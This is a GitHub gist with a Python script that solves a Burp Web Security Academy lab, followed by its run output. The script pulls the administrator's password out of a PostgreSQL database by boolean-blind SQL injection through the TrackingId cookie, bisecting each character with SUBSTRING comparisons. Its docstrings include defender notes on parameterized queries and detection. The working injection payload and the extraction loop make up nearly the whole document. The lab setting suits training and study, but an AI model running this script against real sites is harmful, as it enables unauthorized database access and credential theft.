@iamsilk
Created May 18, 2023 01:00
Burp Web Security Academy: Postgres Blind Injection Password Finder
import requests
def test_query(endpoint, boolean_query):
    """Send one boolean-blind probe to the lab and report whether it held.

    The probe is carried in the ``TrackingId`` cookie, the lab's injectable
    input.  ``injection_format`` closes the quoted cookie value, ORs in the
    caller's condition and comments out the remainder of the server-side
    statement.  The server reveals the condition's truth only indirectly:
    the page contains the ``'Welcome back!'`` marker when the lookup
    succeeded, so that marker is the whole oracle.

    Args:
        endpoint: Base URL of the lab instance (the request is a plain GET).
        boolean_query: SQL boolean expression inserted verbatim; it is not
            escaped, so it must not itself contain a single quote.

    Returns:
        True if the response body contains the success marker, False for
        any other response -- including HTTP errors or rate-limit pages,
        which are not distinguished from a genuinely false condition.

    Note (defender's view): the oracle exists only because the cookie is
    concatenated into a query and the page differs by lookup outcome; a
    parameterized query removes it, and the volume of requests carrying
    SQL syntax in a cookie is a straightforward detection signal.
    The call has no timeout, so a stalled connection blocks indefinitely.
    """
    injection_format="' OR ({}) -- -"
    injection = injection_format.format(boolean_query)
    r = requests.get(endpoint, cookies={
        'TrackingId': injection
    })
    success_needle = 'Welcome back!'
    return success_needle in r.text
def find_password_char(endpoint, index, lower_char, upper_char):
    """Recover one character of the administrator password by bisection.

    Each probe asks whether the character at position ``index`` sorts at or
    below ``middle_char`` (``SUBSTRING`` is 1-based, hence ``index+1``).  A
    true answer moves the upper bound down to the midpoint, a false answer
    moves the lower bound just above it, and the loop ends when the bounds
    meet.  That is one HTTP request per halving, roughly log2(range) per
    character.

    Args:
        endpoint: Base URL passed through to ``test_query``.
        index: 0-based position of the character to recover.
        lower_char: Inclusive lower bound of the candidate range.
        upper_char: Inclusive upper bound of the candidate range.

    Returns:
        The single character the range converged on.

    NOTE(review): ``<=`` on strings follows the server's collation; the
    bisection assumes that order agrees with ``ord``/``chr`` code points,
    which is not guaranteed for every collation -- confirm if results look
    wrong.  If the true character lies outside [lower_char, upper_char]
    the search still returns a bound, silently wrong.
    """
    password_query_format = "SUBSTRING((SELECT password FROM users WHERE username = 'administrator'), {}, 1) <= '{}'"
    while lower_char != upper_char:
        # Floor midpoint of the two code points; with '<=' as the probe the
        # midpoint stays in the candidate set, so the loop always narrows.
        middle_char = chr( int( ( ord(lower_char) + ord(upper_char) ) / 2) )
        password_query = password_query_format.format(index+1, middle_char)
        #print(ord(lower_char), ord(middle_char), ord(upper_char))
        if test_query(endpoint, password_query):
            upper_char = middle_char
        else:
            lower_char = chr(ord(middle_char)+1)
    return lower_char
def find_password(endpoint):
    """Recover the administrator password one character at a time.

    Characters are searched within the printable ASCII range ``'!'``..``'~'``
    and appended to ``password`` until a full-string equality probe
    (``(SELECT password ...) = '<password so far>'``) returns true.  That
    equality check doubles as the stop condition, so no separate length
    probe is issued.  Each recovered character is printed as it is found.

    Args:
        endpoint: Base URL of the lab instance.

    Returns:
        The recovered password string.

    NOTE: the loop has no upper bound.  If any single probe is misreported
    (network failure, rate limiting, a character outside the search range,
    or a character ``test_query`` cannot carry unescaped) the partial
    password is wrong from that point on, the equality probe never
    succeeds, and the function does not terminate.
    """
    final_password_query_format = "(SELECT password FROM users WHERE username = 'administrator') = '{}'"
    lower_char = '!'
    upper_char = '~'
    print("Finding password...")
    password = ''
    index = 0
    # One round-trip to test the prefix, then a bisection for the next char.
    while not test_query(endpoint, final_password_query_format.format(password)):
        password_char = find_password_char(endpoint, index, lower_char, upper_char)
        password += password_char
        index += 1
        print(password_char)
    print()
    print("Done!")
    return password
if __name__ == '__main__':
    # Placeholder lab host as published in the gist; the script is specific
    # to the Web Security Academy blind-injection lab named in the title.
    endpoint='https://xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.web-security-academy.net/'
    password = find_password(endpoint)
    print(password)
iamsilk commented May 18, 2023

$ python3 find_password.py
Finding password...
w
d
o
e
v
m
y
4
e
1
1
e
h
0
8
8
1
s
o
p

Done!
wdoevmy4e11eh0881sop
